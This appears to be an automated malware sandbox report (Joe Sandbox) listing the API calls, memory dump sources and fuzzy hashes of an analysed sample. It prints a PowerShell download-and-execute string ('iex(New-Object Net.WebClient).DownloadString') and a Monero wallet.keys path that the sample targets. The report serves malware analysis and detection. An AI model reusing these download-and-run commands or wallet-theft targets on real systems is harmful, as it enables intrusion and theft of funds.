                          • RegCloseKey.ADVAPI32(00000000), ref: 000387AA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                          • String ID: %s\%s
                          • API String ID: 3896182533-4073750446
                          • Opcode ID: a1a15f728e28e04f4a46e8ccbec96914af9de86cdac3736e7a745a95a765b9c7
                          • Instruction ID: 4d0afa12dca91ea1c34c7b5ce421b6331fd6cdda7594edb2346edc672f198ae7
                          • Opcode Fuzzy Hash: a1a15f728e28e04f4a46e8ccbec96914af9de86cdac3736e7a745a95a765b9c7
                          • Instruction Fuzzy Hash: 8021E971A14218ABDB64DB54DC85FE9B3B9FB48710F10C1E8F609A6180DF71AA85CFE4
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000399C5
                          • Process32First.KERNEL32(0002A056,00000128), ref: 000399D9
                          • Process32Next.KERNEL32(0002A056,00000128), ref: 000399F2
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00039A4E
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00039A6C
                          • CloseHandle.KERNEL32(00000000), ref: 00039A79
                          • CloseHandle.KERNEL32(0002A056), ref: 00039A88
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                          • String ID:
                          • API String ID: 2696918072-0
                          • Opcode ID: 62d56cd19268ba71a1c99da2a3dd3a3aca8f7bbff3cadd31bb859434912239d4
                          • Instruction ID: 0f1802a2fb7f77af733aabb3af27b8d3448bd6ceda2bee9f6863842739f583f5
                          • Opcode Fuzzy Hash: 62d56cd19268ba71a1c99da2a3dd3a3aca8f7bbff3cadd31bb859434912239d4
                          • Instruction Fuzzy Hash: D121FC75904218EBDB61DFA5DC88BEEBBB9BB48340F1041D8E509A6290D7B49E84CF91
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00037834
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0003783B
                          • RegOpenKeyExA.ADVAPI32(80000002,00FCC0F0,00000000,00020119,00000000), ref: 0003786D
                          • RegQueryValueExA.ADVAPI32(00000000,00FDE200,00000000,00000000,?,000000FF), ref: 0003788E
                          • RegCloseKey.ADVAPI32(00000000), ref: 00037898
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: 069372e4292b067876ccb06df10f9d68b5e08d2f62d7233bd0b32b10c3fe7c64
                          • Instruction ID: 90406d1e81969a7fd7d05a3cb03644ace76e88e50502c36669fa7c005e9c3a59
                          • Opcode Fuzzy Hash: 069372e4292b067876ccb06df10f9d68b5e08d2f62d7233bd0b32b10c3fe7c64
                          • Instruction Fuzzy Hash: 1D01ECB5A48309BBEB10DBE4ED4EF7E77BCEB48750F1041A4FA09A6291DA709904CB50
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000378C4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 000378CB
                          • RegOpenKeyExA.ADVAPI32(80000002,00FCC0F0,00000000,00020119,00037849), ref: 000378EB
                          • RegQueryValueExA.ADVAPI32(00037849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0003790A
                          • RegCloseKey.ADVAPI32(00037849), ref: 00037914
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: e0d657de19a66c118bc1bf38b9218cbea9a54c4827fb3f487621b56603a7805c
                          • Instruction ID: e41ae855b43781ff4cdc051cb17201a3ebab407194acf1e5f966c0e8044ab193
                          • Opcode Fuzzy Hash: e0d657de19a66c118bc1bf38b9218cbea9a54c4827fb3f487621b56603a7805c
                          • Instruction Fuzzy Hash: 98014FB5A44309BBEB00DBE4EC4EFBEB778EB04710F0045A4FA05A6281D7706A10CBA1
                          APIs
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0002A13C
                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0002A161
                          • LocalAlloc.KERNEL32(00000040,?), ref: 0002A181
                          • ReadFile.KERNEL32(000000FF,?,00000000,0002148F,00000000), ref: 0002A1AA
                          • LocalFree.KERNEL32(0002148F), ref: 0002A1E0
                          • CloseHandle.KERNEL32(000000FF), ref: 0002A1EA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: e58d82a79bea2922487d55ebdcd461260ab8b1dbaea724d9c8f9b7a506d28c06
                          • Instruction ID: 12061ae35eb0d29520e2a2508c8da573cc8e1037099436ca8f362bcc85524eb6
                          • Opcode Fuzzy Hash: e58d82a79bea2922487d55ebdcd461260ab8b1dbaea724d9c8f9b7a506d28c06
                          • Instruction Fuzzy Hash: 15313074A00209EFDB14CF94E849FEE77B5FF49320F108158E911A7290DB74AA91CFA1
                          APIs
                          • lstrcat.KERNEL32(?,00FDE470), ref: 00034A2B
                            • Part of subcall function 00038F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00038F9B
                          • lstrcat.KERNEL32(?,00000000), ref: 00034A51
                          • lstrcat.KERNEL32(?,?), ref: 00034A70
                          • lstrcat.KERNEL32(?,?), ref: 00034A84
                          • lstrcat.KERNEL32(?,00FCB888), ref: 00034A97
                          • lstrcat.KERNEL32(?,?), ref: 00034AAB
                          • lstrcat.KERNEL32(?,00FDD9A0), ref: 00034ABF
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 00038F20: GetFileAttributesA.KERNEL32(00000000,?,00021B94,?,?,0004577C,?,?,00040E22), ref: 00038F2F
                            • Part of subcall function 000347C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 000347D0
                            • Part of subcall function 000347C0: RtlAllocateHeap.NTDLL(00000000), ref: 000347D7
                            • Part of subcall function 000347C0: wsprintfA.USER32 ref: 000347F6
                            • Part of subcall function 000347C0: FindFirstFileA.KERNEL32(?,?), ref: 0003480D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                          • String ID:
                          • API String ID: 2540262943-0
                          • Opcode ID: 9f168a863952af3ce20bfa866fa429de54ccefe98cae3c30bcf2df2a228d967c
                          • Instruction ID: 0d18f058f70e987f1f1c60d462c4003b8ef597e6e60b73e49d155576632a0025
                          • Opcode Fuzzy Hash: 9f168a863952af3ce20bfa866fa429de54ccefe98cae3c30bcf2df2a228d967c
                          • Instruction Fuzzy Hash: BE3160B290021CABCB15EBB0EC99EED733CAB58700F4049D9B64596052EF70A7C9CB94
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00032FD5
                          Strings
                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00032F14
                          • ')", xrefs: 00032F03
                          • <, xrefs: 00032F89
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00032F54
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 3031569214-898575020
                          • Opcode ID: 5279cff93d1bdbe455f8dde4d10bce8e33a0272a1b8cbe65a3d8dd758177a92a
                          • Instruction ID: bb9cdf332278347a9437b126c91840f1870991499821a2b0a02ab2976ade78e7
                          • Opcode Fuzzy Hash: 5279cff93d1bdbe455f8dde4d10bce8e33a0272a1b8cbe65a3d8dd758177a92a
                          • Instruction Fuzzy Hash: FF41FC71E102089ADB1AEBA1D8A2FEDB77DAF11300F404569E1467B193DF702A4ACF55
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,00FDD760,00000000,00020119,?), ref: 00034344
                          • RegQueryValueExA.ADVAPI32(?,00FDE4D0,00000000,00000000,00000000,000000FF), ref: 00034368
                          • RegCloseKey.ADVAPI32(?), ref: 00034372
                          • lstrcat.KERNEL32(?,00000000), ref: 00034397
                          • lstrcat.KERNEL32(?,00FDE518), ref: 000343AB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValue
                          • String ID:
                          • API String ID: 690832082-0
                          • Opcode ID: eea488acc48ae3eef7e747b0cb13ac2209b529f99d0fc4e2c29046cfa09bbde4
                          • Instruction ID: dd48623648c38e3874b1ea95a478f7d68b564b44e97143ace273e910820f728c
                          • Opcode Fuzzy Hash: eea488acc48ae3eef7e747b0cb13ac2209b529f99d0fc4e2c29046cfa09bbde4
                          • Instruction Fuzzy Hash: 54418BB6900118ABDB25EBA0FC5AFFE733DAB48740F0045A8B71657182EA75578CCBD1
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: dllmain_raw$dllmain_crt_dispatch
                          • String ID:
                          • API String ID: 3136044242-0
                          • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                          • Instruction ID: f2de062f31bdb1b05cf60d8418b59369c2958c2c43fb00d33067fb891992140d
                          • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                          • Instruction Fuzzy Hash: F8218EB2D00618BBFF619F55CC41EBF3EA9EB81B90F054129F80E67252C3308D41ABA0
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 00036C0C
                          • sscanf.NTDLL ref: 00036C39
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00036C52
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00036C60
                          • ExitProcess.KERNEL32 ref: 00036C7A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$System$File$ExitProcesssscanf
                          • String ID:
                          • API String ID: 2533653975-0
                          • Opcode ID: 400fe66a849fc5722da8323ffabcbb05e39dd6ae54eb8142fd52ae9a9c762011
                          • Instruction ID: 2b871d62739766a7b9fb3c2a24d5d357ad1432f6811d2122ba3c2808278b885e
                          • Opcode Fuzzy Hash: 400fe66a849fc5722da8323ffabcbb05e39dd6ae54eb8142fd52ae9a9c762011
                          • Instruction Fuzzy Hash: ED21CB75D14208ABDF05EFE4E8499EEB7B9FF48310F04852AE506E3250EB359608CB65
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00037FC7
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00037FCE
                          • RegOpenKeyExA.ADVAPI32(80000002,00FCC358,00000000,00020119,?), ref: 00037FEE
                          • RegQueryValueExA.ADVAPI32(?,00FDD6E0,00000000,00000000,000000FF,000000FF), ref: 0003800F
                          • RegCloseKey.ADVAPI32(?), ref: 00038022
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
